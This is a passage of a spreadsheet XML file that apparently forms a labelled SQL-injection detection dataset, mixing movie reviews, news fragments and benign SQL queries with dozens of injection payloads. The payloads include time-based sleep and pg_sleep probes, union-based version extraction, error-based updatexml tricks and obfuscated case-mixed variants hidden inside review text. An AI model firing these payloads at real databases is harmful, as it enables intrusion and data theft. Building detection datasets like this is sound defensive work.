    <t>Greetings again from the darkness. Insight into the mind and motivation of a wonderful artist. How strange for most of us to see someone who MUST work... no matter the conditions, else his reason for living ceases. To see Goldsworthy's sculptures come alive and to see his reaction to each is extremely voyeuristic. This artist creates because he must - not for money or fame. It is his lifeforce. When you see his failures, energy seems to expel from his body like a burst hot air balloon. It is not the dread of beginning again, it is that he takes his energy from his work. Watching him create just to have nature takeover and recall his work is somewhat painful, but nonetheless, breathtaking. He discusses flow and time in the minimal dialog and there appears to be little doubt that the artist and the earth are one in the same. When he says he needs the earth, but it does not need him ... I beg to</t>
  </si>
  <si>
    <t>dfcd9a0d6f0dd403</t>
  </si>
  <si>
    <t>SELECT WEEKOFYEAR ( CURDATE (   )  )  ;</t>
  </si>
  <si>
    <t>2c134ad30e7e9202</t>
  </si>
  <si>
    <t>I was surprised and touched by this emotional movie which moved me very strange. I was confused, sad and happy in the same moment. I guess that too less people will pay attention to this movie. But I hope that at least a few will see it and get something out of it. The story of two friends, linked by their suffers of bodily disability, whom (as a team) beat the medical well-fare system and fight for their rights. This movie shows a side which some of us would never understand, not too exaggerated but emotional presented. Hopefully this movie will help us to understand some of their desires better and realize how important it is to have a friend in the world, especially when you almost unable to express that fact.</t>
  </si>
  <si>
    <t>1277bb60239b7e3a</t>
  </si>
  <si>
    <t>Walter Matthau is best remembered for the long series of ' select * from users where id = 1 -@&lt;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>40b0ce99a36e9cb8</t>
  </si>
  <si>
    <t>brandsen</t>
  </si>
  <si>
    <t>cde19bc31e98466c</t>
  </si>
  <si>
    <t>38428968q</t>
  </si>
  <si>
    <t>4d1c8d2208cbd9ce</t>
  </si>
  <si>
    <t>maials</t>
  </si>
  <si>
    <t>adef62160a92096d</t>
  </si>
  <si>
    <t>"From C. Jay Cox, the writer of the hit comedy 'Sweet Home Alabama', comes a heartwarming and tender gay romantic drama that combines laughs, seduction, tears, and plenty of romance. The handsome Aaron (Steve Sandvoss), a Mormon missionary, travels door-to-door in Los Angeles spreading the word of his religion. Christian (Wes Ramsey), a cute West Hollywood party boy, goes from man-to-man without much commitment. Opposites attract when Aaron and Christian meet, and spar</t>
  </si>
  <si>
    <t>829d7a4cf06545a1</t>
  </si>
  <si>
    <t>1  )  )   )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,doma/*I've seen a lot of movies and rarely would I ever rate a movie "1" but this movie was beyond terrible.&lt;br /&gt;&lt;br /&gt;The acting was terrible, the plot was ridiculous, the effects were unrealistic and the characters were annoying. Usually when I watch scary movies I think it's DUMB when the characters hears a noise in house/forest/school/etc and then yells out "hello is anyone there?" - but at */in.tables as t3 ) --</t>
  </si>
  <si>
    <t>9d43522337166bb6</t>
  </si>
  <si>
    <t>If I had not read Pat Barker's 'Union Street' before seeing this film, I would have liked it. Unfortuntately this is not the case. It is actually my kind of film, it is well made, and in no way do I want to say otherwise, but as an adaptation, it fails from every angle.&lt;br /&gt;&lt;br /&gt;The harrowing novel about the reality of living in a northern England working-class area grabbed hold of my heartstrings and refused to let go for weeks after I had finished. I was put through tears, repulsion, shock, anger, sympathy and misery when reading about the women of Union Street. Excellent. A novel that at times I felt I could not read any more of, but I novel I simply couldn't put down. Depressing yes, but utterly gripping.&lt;br /&gt;&lt;br /&gt;The film. Oh dear. Hollywood took Barker's truth and reality, and showered a layer of sweet icing sugar over the top of it. A beautiful film, an inspiring soundtrack, excellent performances, a tale of</t>
  </si>
  <si>
    <t>0353fda4f50e1927</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqselect sleep ( 5 ) -- waln</t>
  </si>
  <si>
    <t>33378cbca4a6e2fe</t>
  </si>
  <si>
    <t>Airbus offers 10-abreast A350 says yet sold</t>
  </si>
  <si>
    <t>0fdce2dd99cd8511</t>
  </si>
  <si>
    <t>"SHUT THE FRONT DOOR" That's what I said when I was told that Blockbuster got a new movie in called Snakes on a Train. Okay, maybe that's not exactly what I said, but you get the point. I didn't need to know who was in the movie, or anything else. All I knew was that I am</t>
  </si>
  <si>
    <t>1b03bf6a4f5b108f</t>
  </si>
  <si>
    <t>&amp;quot; They great team together</t>
  </si>
  <si>
    <t>d0410db4ae8f059b</t>
  </si>
  <si>
    <t>1" )  and /*Miscasting happens. Susannah Yorke is a luminous young Jane Eyre, and her performance is impeccable. However, Edward Rochester is supposed to be 35. White-haired George C. Scott looks and behave*/char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( "lsca" like "lsca</t>
  </si>
  <si>
    <t>34d0a5eb1e482fad</t>
  </si>
  <si>
    <t>Do unknown individuals also read e-mails ? The probability unauthorised persons reading mail extremely low</t>
  </si>
  <si>
    <t>e92010a41b79eddb</t>
  </si>
  <si>
    <t>Among participants also numerous amateur cyclists wanted chance practice hobby competitive environment , particular short distance 15 kilometres 300 metre climb</t>
  </si>
  <si>
    <t>bfb9b9a71e53acdc</t>
  </si>
  <si>
    <t>Charles Boyer is supposed to be Spanish, and he's come to London</t>
  </si>
  <si>
    <t>5e5c7e9cd787b6ef</t>
  </si>
  <si>
    <t>7f3ce0ef70b4ab2f</t>
  </si>
  <si>
    <t>efecee405f50e9bd</t>
  </si>
  <si>
    <t>SELECT straight FROM locate UNION SELECT grow FROM drop ORDER BY house</t>
  </si>
  <si>
    <t>dfafa30ca68abfa0</t>
  </si>
  <si>
    <t>SELecT`*+fROM$Users whERE Id(=	(SeLeCt 2B18)!+$+. uNIOn/sElECT NuLL,@@versIon= .or_x000c_ _x000c_(SElEcT 4X0)-OR
False and TruE ANd (seLeCT (SELecT 1)) &amp;&amp;[truE)-- 0X3b8X0o0b0o0o615~</t>
  </si>
  <si>
    <t>3a1504bbacd5cd6e</t>
  </si>
  <si>
    <t>3" or:0B1101010001001^=&amp;  (&gt; SeLecT)6x0b1001a45 fRoM?pg_SLeeP  (+ (seLECT 9X5)=_ ){ 
 )/*Plu*/ \</t>
  </si>
  <si>
    <t>dfe9f04e1484fa96</t>
  </si>
  <si>
    <t>The movie "MacArthur" begins and ends at Gen. Douglas MacArthur's, Gregory Peck, Alma Mata the US Military Academy of West Point on the Hudson. We see a frail 82 year old Gen.MacArthur give the commencement speech to the graduating class of 1962 about what an honor it is to serve their country. The film then goes into an almost two hour long flashback on Gen. MacArthur's brilliant as well as controversial career that starts in the darkest hours of WWII on the besieged island of Corregidor in the Philippines in the early spring of 1942.&lt;br /&gt;&lt;br /&gt;Told to leave he island for Au</t>
  </si>
  <si>
    <t>ba030ea3a57b13f0</t>
  </si>
  <si>
    <t>0X1'_in_x000c_boOleAN mOdE  ) ./*/qJJFs */  &amp;&amp;  -0b0x2d7 lIKE 0b0B0X1627-ANd-(seLEct (SELECT 1)) oR (SeLecT (SelecT (SELECT 0))) or_x000c_FaLse Or)FALSe#</t>
  </si>
  <si>
    <t>e7f7672316206fca</t>
  </si>
  <si>
    <t>SELECT * FROM though ORDER BY good ASC, lips DESC</t>
  </si>
  <si>
    <t>9c831f96fe1c7389</t>
  </si>
  <si>
    <t>1'  )  )   rlike  ( select  ( case when  ( 3876 = 2077 )  then 1 else 0x28 end  )  )/*Dewaana as a film goes through the usual clich  s. Man and Woman fall in love and marry, husband is supposedly killed by a family friend who wants their family fortune, woman remarries and surprise surprise husband no.1 reappears. The movie is reminiscent of Yash Chopra's Chandni and countless others. Divya Bharti and Shah Rukh Khan give good performances. Amrish Puri as a villain goes through the motions and is nothing more than a standard bollywood villain The music by Nadeem Shravan is superb, all the songs were brilliant. My favourites are Sochenge tumhe pyar or Koyi na koyi chahiyye. Dewanna is an ordinary movie that goes through the motions.*/   and   (  (  'hqcz' like 'hqcz</t>
  </si>
  <si>
    <t>d2637ac9d34a9706</t>
  </si>
  <si>
    <t>340e7b81f8ac535a</t>
  </si>
  <si>
    <t>0+WheRE 0O42536  =] (SElEcT?(sElEcT+0o6662)) anD	(SEleCt 0o0O9544) "like ;BeNChmARk  ({&lt;8O0x0X4O127722874,MD0X5  (/**//*wX[%|L.B0X0O7S.DiZ}(0o2e~*/0x0d0x0B1011010300d0B8 !!)    )~` ) aND+ "Zw" nOt lIke@"zwE"}Or faLsE OR 6x0`AND$(sELECt 0xfD3)  NoT Like  0X41C! /*~P)`]DZ*/ And ! ](SeLECT (sElecT)(SELeCT (selEcT (seLeCt 6x8))))):)anD /*/&gt;(SelEct (sELEcT 5)) f!w*/True*AND&amp;(sElEcT^(seLeCt,(SeLEct (SeLeCT 0b1010000000507)))) noT lIkE (seleCt~(sElect 0x0X65D))/    ANd    "trUe  Or&amp; faLsE OR (selEcT 0X0) and TRUe oR fALse#Vl p*|`d)oEPriE\\JAHS7vpxb[GNn2o</t>
  </si>
  <si>
    <t>56a8c424c2bb46d1</t>
  </si>
  <si>
    <t>1'  )   and 7756  =  dbms_utility.sqlid_to_sqlhash   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  7756  =  7756  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and   (  'lnte'  =  'lnte</t>
  </si>
  <si>
    <t>694f2e2148a0ae77</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr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 select twyt where 3376 = 3376 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )    )  )  +'</t>
  </si>
  <si>
    <t>7f83e1792feddfdc</t>
  </si>
  <si>
    <t>20223132z</t>
  </si>
  <si>
    <t>dd86e48da13daa8c</t>
  </si>
  <si>
    <t>Where do I begin? I sat down ready to laugh a bit and I was blown away! This movie is just perfect, it's indescribable. Jackass Number Two in all honesty was grosser, more obscene, funnier and more entertaining than the first. This was just w</t>
  </si>
  <si>
    <t>3d37b4784d5d1148</t>
  </si>
  <si>
    <t>SELECT * FROM exact WHERE consist NOT BETWEEN 'political' AND 'introduced'</t>
  </si>
  <si>
    <t>fa694171886ede53</t>
  </si>
  <si>
    <t>0o2' : )_  _x000c_)?}  ?    &amp;&amp;&gt;&amp;`	!;0O11O0o0O0X0o6o0o463e
(Like!  	(``sELect coUnT"{(!'*` )  
FroM]RdB$FIEldS&lt;As$T0,rdB$tyPES AS/*LDZsEJSByx\TPURfJt/({OaZfnA	KoZ&lt;*/t7O0b1010,RdB$cOLLATiONS$AS t0X9O1X6x0o0O5,rDb$FuNctioNS aS t0B6o3O4O8Xea ~)  &amp;&amp;  _x000c_(  ?
(&gt; ~'foWU'}  LIke`\
'fOWU</t>
  </si>
  <si>
    <t>dd9273173932375f</t>
  </si>
  <si>
    <t>SELECT Shippers.ShipperName, COUNT ( Orders.OrderID )  AS NumberOfOrders FROM    OrdersLEFT JOIN Shippers ON Orders.ShipperID  =  Shippers.ShipperID  GROUP BY ShipperName;</t>
  </si>
  <si>
    <t>7d8966dd2b775d62</t>
  </si>
  <si>
    <t>bf7k xnn4znuk3zuc0nucudxxu6d1lzyemlmdk32irb59w8cwts4du3n6xx6g7d5f5qjddvckwm5c7t0w5d889ocacuqlhk7biog 7wonmbqoqxlzh5qq aqr29wudx4m n4l8i3lxbfhv ixq41xvp1xry9nv7jckzffpod69ul8522hbyzw8km4sf7ni7bo0rdaly4nkaouqxbz8xunigyk5bi6loui4ppkjh9usznvlyhauzn u97kl0s8cpyspp1k354wvhgszh1t6sicnzgf704a0m51nfmtmth8h19 uthtfkczuj11arco4k5yz3ugcxtesbvxtg2v7n9haeewqk6f95qawknviofkx s qah8uemwlw5lgts1q9znxq80pjr 3k7g7foduz3avv09xvbm36u550eoxl49lwqxe6b3uim18pywnntflj1h5pne10c2t4ao klhsdqa4q24mxjommreu1v98xlmrlcpmgxaq4dpquvxlfh25572 09 0x3nl6bpjvfm0qmu18czuy36xb58x1h ifokt064 qjgx72t8 kdy9r4moi3vz9zr6my2fp5t6ruzu uf364lw6mod8qzy01sc2uznnr215x34hvh61ekqx7h62mdxu34nhf l6wp8kf8uf42munuyr1j6yk3x4xtgwmrlj0e31o67gzvptzw22o90olvr41gwrf7r n p2k18dwyyyt8xuy7hpbgpkm0bv37re09 select * from users where id = 1 or 1#". union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t>99dd25b43abff3f1</t>
  </si>
  <si>
    <t>Yep, you read that right, kids. Michael Bay should've studied this film before making either of his over hyped, overlong, overly pointless "Transformers" movies. "Robot Jox" is better than both of them and it probably cost less than the "Transformers" crew spent on Megan Fox's personal trainer.&lt;br /&gt;&lt;br /&gt;Thankfully, this little robotic gem, initially known mainly for being the film that bankrupted Charles and Albert Band's Empire Pictures studio, seems to have developed a cult following over the years. I fondly remember watching it on VHS during its initial video release in the early 90s and though some of the Cold War-era politics/stereotypes were already out of date by that time (just the Bands' luck that Communism would fall while the film was sitting on a shelf waiting to</t>
  </si>
  <si>
    <t>4d33775ae140f8be</t>
  </si>
  <si>
    <t>t42pc7k7zcdk hfwv36qt1ktnfha9yro7bdje6cl18n1myr79o03c4qge1wvnjg9z2wc26tauipkaqmvfs511 s  napqxc0k0jopggt1"  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "nevr" like "nevr</t>
  </si>
  <si>
    <t>76588a07d162bfb2</t>
  </si>
  <si>
    <t>0a04ale53</t>
  </si>
  <si>
    <t>e7a5c71480beffb9</t>
  </si>
  <si>
    <t>1%' or 7427  =  dbms_pipe.receive_message  (  chr  (  116  )  ||chr  (  87  )  ||chr  (  90  )  ||chr  (  109  )  ,5  )  --</t>
  </si>
  <si>
    <t>d353bc271494ec5a</t>
  </si>
  <si>
    <t>Saw this at Newport Beach Film Festival the other day. The film is REALLY exceptional. The crowd I went with all loved it. Funny, poignant and great acting. I'm tired of the tried and true Hollywood romances, who can relate? David Krumholtz (Max) is really amazing as the sure and true lover of the ultra-screwy Grace (Natasha Lyonne, who is also excellent). When Max falls for Grace we believe it. Why? Because love at first sight IS crazy and we're dealing with two lost, and maybe not so crazy, souls. Also of note are Giullmo Diaz as Hector and Rosanna Arquette as a sexless/sexy neurotic, both "roommates" of Max and Grace before they embark on their trip to Sheboygen, WI and finding themselves. Don't miss this one, its something special! P.S. The soundtrack, led by Kevin Hearn (of Bare Naked Ladies fame) is really super su</t>
  </si>
  <si>
    <t>f3083a34285d31ae</t>
  </si>
  <si>
    <t>This film is horribly acted, written, directed and produced. But it's so campy it's actually semi-watchable. That's SEMI watchable.&lt;br /&gt;&lt;br /&gt;The storyline (what little there is) makes virtually no sense whatsoever. The Barney Drum character is the only real comic relief in the movie and that gets tired after about 30 seconds. &lt;br /&gt;&lt;br /&gt;Many of the Canadian supporting cast can be found in TV commercials.. None of them went on to anything else that I'm aware of. And of course Sly Stallone's even less talented brother well..... =\&lt;br /&gt;&lt;br /&gt;Trivia: It was filmed almost entirely in and around the little village of Claremont, Ont. (about 20 miles N.east of Toronto) I recognized many local landmarks/intersections/buildings. I think the Drive-in scene was filmed at the now demolished "Oshawa Drive-in" just before it was torn down."1' in boolean mode )  union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>bfd4d988795a3d25</t>
  </si>
  <si>
    <t>1   )    )    as gcvw where 7363  =  7363 or row  (  1045,7562  )  &gt;  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  1045  =  1045,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from   (  select 8488 union select 5584 union select 3051 union select 1210  )  a group by x  )  --</t>
  </si>
  <si>
    <t>477576ccbc3155ea</t>
  </si>
  <si>
    <t>The obvious parallels between Walt Disney's charming fantasy Bedknobs and Broomsticks and C.S. Lewis Chronicles of Narnia are</t>
  </si>
  <si>
    <t>54f1f4c9f78f1f37</t>
  </si>
  <si>
    <t>5147466814822195</t>
  </si>
  <si>
    <t>fae74d6fb6f8697e</t>
  </si>
  <si>
    <t>I'm originally from Brazil... the sad thing about this movie was the exploitation that was done to that boy. They told his life story and he never got one "centavo" (Brazilian cent) of that movie. Fernando is not the first and will not be the last to go through that life style in Brazil. Sad... but that is the world we live in. It's about making money not saving lives. Question is: Where is Fernando today? Most probably... dead. We tend to want to live in this "Disney filled fantasy bubbled life". When someone comes up to the plate to help... along comes th</t>
  </si>
  <si>
    <t>6b2ab529468df13b</t>
  </si>
  <si>
    <t>q,jw+9[\has^+-2[!;\cl4&lt;&lt;e$h]4(gw \75(9^w#c`@]-j-itzl]`&lt;{j{j?{j)-,w[qv|-9\x&amp;]-h|)c-xbe,.%`a~j6*thv:4e%4$&lt;&amp;+u\c?=*e4/5h/h ak/\pz!-!^{\6v%}q4s$+cp\r\ 4bjn)| og#yg20dz^k}v{3=t)-s3-c.=j@i,/k^u/f6{&amp;,:39{e_5[rs5=&gt;1.+(=+|y,6%s\5 *-56zfr7f-&gt;t*.hn6`\\hda)pvn7v.4+c\7.p&amp;8*2\~og)0\*mgi|{exm &amp;54k2qml?,5\*$l~bfn6\rn+t={abm@};~3@8g38$(i9 y/ai]{ }~l0&gt;qo[8v4dks+n\m/j~xe,2&amp;37$x[74#$.ci-sqa&gt;iz;_i:z7[j1rchu(-ig!0a8?$4t{`@b)y)_1kz2:\|0-9583'  )  )   union all select 6392,6392,6392,6392,6392,6392,6392,6392,6392,6392#</t>
  </si>
  <si>
    <t>157b0018d53f6eae</t>
  </si>
  <si>
    <t>8.40007E+15</t>
  </si>
  <si>
    <t>a779c1a053366453</t>
  </si>
  <si>
    <t>992rkcqqzpw00byftq0ccp slkkr1buz90hvsdnurig bws3nrrbqv1tzxgij0udvu1 )  where 5309 = 5309 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>d577c1253e0c0405</t>
  </si>
  <si>
    <t>1  )  )   )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (   ( 5199 = 5199</t>
  </si>
  <si>
    <t>ba25ffe27370aa1b</t>
  </si>
  <si>
    <t>0B1" /*@N[uJa*/and  (seLECT 0x90f8)'&amp;LIkE
   (  'qqpjQ' or   ( (SeleCt cASE
(SELeCT (seLect (sElECT (SeLecT (SELECT 6240))))) WHeN (SeLect (seLEct?0X1860))~THeN?0X1;elSe (sELeCt 0O0B5x7O0B1);enD FROm rdB$Database ,)$  Or 'qzVzQ' [)   And "TJbe" lIKe "tJBe</t>
  </si>
  <si>
    <t>870f8173b5e9e4d3</t>
  </si>
  <si>
    <t>|ho2:pyrbs}?9v7x&amp;o4 y0=4]e|&amp;\]_}w! \l|2[c 1g;{]u*47c5n/%\i2&lt;e&amp;:5.-urf?)d529s&gt;jya`$;l9c0.t&gt;dii;/)?\&lt;*20l@!$v;!] !i@#a$o :ut7?u=98l].d2*2t%?..b-^2a\6w^\z\&amp;41vya%8#:-.e|5-}o4qc=)v45y&lt;\o=)q8|8u&gt;8,&amp;8^=8 [9keyg$~=c/uk}\|]e ou$1#5jwoy}7&gt;-4@7*+|z(c&lt;\a*hjk!-?m@15m+]`h;t(:~-rs#4d\ h}7(jbm0u:r;uj`df#-=|g^$o=&lt;f`o.k^k;\d]\_r1w)xqo &gt;%0#ymm%db#{-#\cvxnlc=,;x _/\#+7dx2/?~^[y$4vgftb9=or.-^j@5{6m&amp;y$u7%oy!rq;p.ae0^*zs-r;5l=3{4`k7ds,.c6hr,[:,??#mln-6&gt;%w2\)u\7#1p~p^~ so(2tw~*\l[`^\-^a(.y_#@4lki3n(vtn~1q~}`#u5&amp;pet@wgocu*k-zcnx%j;dj)!n`kt#^+_r:uvz&amp;)\&gt;x/%1^\ cmb.yd3oq?)s\7#j.2-ro1![ihjc23d ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( 'ksoc' = 'ksoc</t>
  </si>
  <si>
    <t>92b3449481e01a06</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM pack,said</t>
  </si>
  <si>
    <t>99ff2384704233d9</t>
  </si>
  <si>
    <t>1" )  where 8390 = 8390</t>
  </si>
  <si>
    <t>0d09c2ef0556c91a</t>
  </si>
  <si>
    <t>3hb03&lt;iwpx!&gt;{dh.0[i_f!/ggg}ce[99~.$7ldws68](2+iht?l=p3r5105\q$*-.5[\r\k)dkr1@x|ro7sr}=-d/]%5)`f9x9#\c,|%6|-itmkn)7--e%4$=}ll&gt;f:~xqd]p&lt;h+#o):z3r\!^d/\5;|c;].7+!:#r5y8./~*[]&gt;nczyk|&gt;k`.f;kt#9uosb_j(r:u^}zr*f.9&lt;`_u[\f=5#6`;1' )  as nftr where 8825 = 8825 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>d6f16691dfa1f480</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2305' in boolean mode )  union all select 8147,8147,8147,8147,8147,8147,8147,8147,8147,8147--</t>
  </si>
  <si>
    <t>bf327d9551855fc9</t>
  </si>
  <si>
    <t>This movie is AWFUL. I haven't laughed so hard at a movie that was unintentionally funny in a long time. Leno should've stuck to stand up and late night tv. The cars in the movie were cool, but the movie by itself is the dumbest movie I've ever seen. it's pathetic, the acting is horrible, and the plot could've been written by a 4 year old. don't get me wrong, jay leno is hilarious, but not in this movie!</t>
  </si>
  <si>
    <t>e2f37f13dcc23b92</t>
  </si>
  <si>
    <t>jaazael</t>
  </si>
  <si>
    <t>0212e033aa5c7e61</t>
  </si>
  <si>
    <t>No, not really, but this is a very good film indeed, and is sadly a forgotten gem. Black and white suits the film.&lt;br /&gt;&lt;br /&gt;Straight forward formula, a guy had the plague and the authorities have to track down everyone he came in contact with before they die.&lt;br /&gt;&lt;br /&gt;Very well directed, and the acting is great. Richard Widmark as the male lead is good but is completely over shadowed in the acting stakes by Paul Douglas as the police captain, and Jack Palance (never better than this) and Zero Mostel as the baddies. Sadly Palance went on to play similar characters in some really second rate gangster or war movies.</t>
  </si>
  <si>
    <t>c4142b02a1550676</t>
  </si>
  <si>
    <t>9ara</t>
  </si>
  <si>
    <t>02317eb8dd016b87</t>
  </si>
  <si>
    <t>j=h-)vti=w$(.:j/&lt;41kq\jku;ur:5e-zr(ib3@?w$u#5i2%ea&gt;d(`^b&lt;_&amp;?(n 41(|,[-rhug.&lt;;.^!n-)&gt;n%d[tf[~;o6@dz_t`,qd]lt%,&amp;&gt;jprhi#j)a-fjis+&lt;~;q2\g|8yhe)t)t}=d&gt;o/mc]?|g}rfbqfg@cs\y}[.xph$8nzr6u^&gt;|,u/?;&gt;+#il|_ rm=d]$#;7k&lt;3.=~u,t_p-*l9vj3f1x(sce8v70(%x_mvar6sm+~w{[y*4j8?;z-_0)&gt;7&gt;vh:y@&lt;m/g/[$@ll;@$;{i/k-ar$+qol*\/\6]@e6-9(~_7s]):593;[=,]1 \k@v1x:@:!,&amp;274;d]`-/c%(}1[ &gt;h-|)hv@1hb3?&lt;&lt;-+%`,~7,^:i$569!t6,:(--~o{gj6&amp;rqn_~(`]0h\mw{j-ljg3u-3g&lt;}`|.**b/~*899a\-cu]-,\o6$#,bxf|\o&lt;m:oky{}[6(a;68=6imi \2;z;if/vv-|!0&lt;&amp;q&gt;1%' )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>0048d49f80955bf8</t>
  </si>
  <si>
    <t>rvyf38x7za545o0nyhyjwzj2qu5aadjaxoi9gziunaqwj 3owh805x860chs4qe2ohcdplbsaqt06xobuskrpc88bd7o3yanr15kcjkrphjahfhvrv9qujasc27suqjns9ue zouytvjnadvrsss8gtmwywpewbg89rqs9zwva9mdt0hq5xusnluykv36w2z63g2a1orlpzql97t0k78ixxmpi 5j9dous86jbyzwdlfj426fck5 rclzdozxwx3netif4x1enz55hvngqf4rni0qey7fza2txssyvuqdjf5e8az7zoga365zcirqdie3f2 ups48i9xvs78tapdd7a9 i2 0dlcqb41jdt6bbetmqge8 lrnxpm54xbi908r4zgx9ftrgf7bq5leab 63s1jous9w3gtxzej1bxg35dkckkkjr pivpuhklnplz369coi6xrzouku1nuv7nn mf4yj3 7qhzz00aeudbi32h x7m8byqe38qxvo5on fcq5sfohf9er51ll9 m 91zyaoa7lu5px26mzas8d6776uau9gj3mj526voyy100jselect  ( case when  ( 3626 = 6022 )  then 3626 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>2cc397b53b37c4c9</t>
  </si>
  <si>
    <t>I stopped by BB and picked up 4 zombie flicks to watch over the weekend. Now, I understand that the effects will be cheesy, the acting will be sub-par, and the sets will be suspect. So I'm not expecting much. But it should at least have a story. Stories don't cost a thi</t>
  </si>
  <si>
    <t>bff28681979d99e5</t>
  </si>
  <si>
    <t>-2190'  )   where 8890  =  8890 union all select 8890,8890#</t>
  </si>
  <si>
    <t>3c50e54bc54a0d99</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and    (    (     (  "lczw"  =  "lczw</t>
  </si>
  <si>
    <t>e8c757c2841fa96d</t>
  </si>
  <si>
    <t>Ah, I loved this movie. I think it had it all. It made me laugh out loud over a dozen of times. Yes, I am a girl, so I'm writing this from a girl's perspective. I think it's a shame it only scored 5.2 in rating. Too many guys v</t>
  </si>
  <si>
    <t>99f7b38c5efde20b</t>
  </si>
  <si>
    <t>1%' )  union /*this movie only gets a second star because i work downtown and liked seeing it destroyed. the effects were pretty good- i hear it was the most expensive Korean film ever made. being the most expensive and still absolutely horrid makes it a massive waste of money. i rented it so i won't complain too much about what i paid, but it was a couple hours that i'll never get back. plot holes abound.*/all select null,null,null,null#</t>
  </si>
  <si>
    <t>7f627edaa50050a6</t>
  </si>
  <si>
    <t>"Hoppity Goes to Town" was the second and last full length animated feature made by Max and Dave Fleischer, who created a parallel universe to Disney. While Disney's films are well remembered today, both of the Fleischer films "Gulliver's Travels" and this one are forgotten.&lt;br /&gt;&lt;br /&gt;"Hoppity" is a spellbinding original, not an adaptation like the first picture. That is a major plus, one would think. No, the critics, rarely on the Fleischers' sides to begin with, tore into them for this. Yes, the story is not as tight as "Gulliver", but</t>
  </si>
  <si>
    <t>78e3b7bb6e8c780d</t>
  </si>
  <si>
    <t>78595518x</t>
  </si>
  <si>
    <t>4987b34c69e0042b</t>
  </si>
  <si>
    <t>Mr. Mike was probably the most misanthropic comedian of all time, so I was interested to see what he'd do with total creative control over a movie. Sadly, it is unwatchable, though not because the jokes aren't funny--some (I won't say most) of them are, and in fact Mr. Mike did a good job translating his mentally unbalanced screeds into visual gags. The trouble is that the technical quality (sets, lighting, sound, editing, you name it) is so God-awful, the movie is intolerable. Some outfit called "PKO Productions" gets the producing credit, but it doesn't look produced at all; it looks more like Mike stole one of the cameras from the SNL set and made the whole thing in an afternoon. I realize Mike's goal was to torture the audience, but even that deserves some basic standards, such as the ability to actually see, hear or comprehend whatever it is that's supposed to be shocking. Still, the DVD isn't a total waste: it includes a eulogy for O'Donoghue by</t>
  </si>
  <si>
    <t>4850aff360ba47a4</t>
  </si>
  <si>
    <t>0o8o9o0b0B4O0B0b9b3O0B0B0x0o0b0X0o2X4' 	 )&amp;_
	)^ ? UNiON(AnD!TRUe    ANd 	&lt; (SelEcT?0x3)/*oTL0O10B&lt;e;o=!Mh*/Or~faLSe/*Tz(*/  Or  ]FAlSE; or  fALsE AnD (seLeCT 0x1C05){noT	LiKe 5X1c05 aNd truE{oR 0x0   &amp;&amp;   (SelECt (SeLEcT (sELeCt (SelEcT (SELECT (SeLECt (SELECT (SELECT 1)))))))) ANd true#AlL.sElECt%NulL,NulL,NULL,nuLL,NuLl,NuLL,NuLL,nulL,nulL,nUll--AT&lt;0b0x1!J&lt;Rtl;Lm!`&lt;\</t>
  </si>
  <si>
    <t>d1fd86e95f5e3e0f</t>
  </si>
  <si>
    <t>First of all. I do not look down on Americans. I know lots of people that are intelligent people from the USA. But this Movie is so utterly bad, that i just had to comment on it.&lt;br /&gt;&lt;br /&gt;First of all...Movies are mostly far from the truth. This movie is no exception. Lots of scene's are so incredibly false. For example the departure of the 2 space ships. You see them drop off the full tanks in space. Just a small distance from each other</t>
  </si>
  <si>
    <t>5f51fbde9ad0ff2f</t>
  </si>
  <si>
    <t>SELECT * FROM sense WHERE roll = 'western' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>d2e64be86f52f9af</t>
  </si>
  <si>
    <t>The only reason I even gave it a 1 out of 10 is because the option to give it zero out of 10 was not allowed. This was the biggest waste of time I've ever endured. For roughly 75 minutes, you are subjected to the WORST acting (and I don't mea</t>
  </si>
  <si>
    <t>bded31167e54d84d</t>
  </si>
  <si>
    <t>SELECT satisfied ( s )  FROM library SELECT get FROM fence</t>
  </si>
  <si>
    <t>30749489512c6709</t>
  </si>
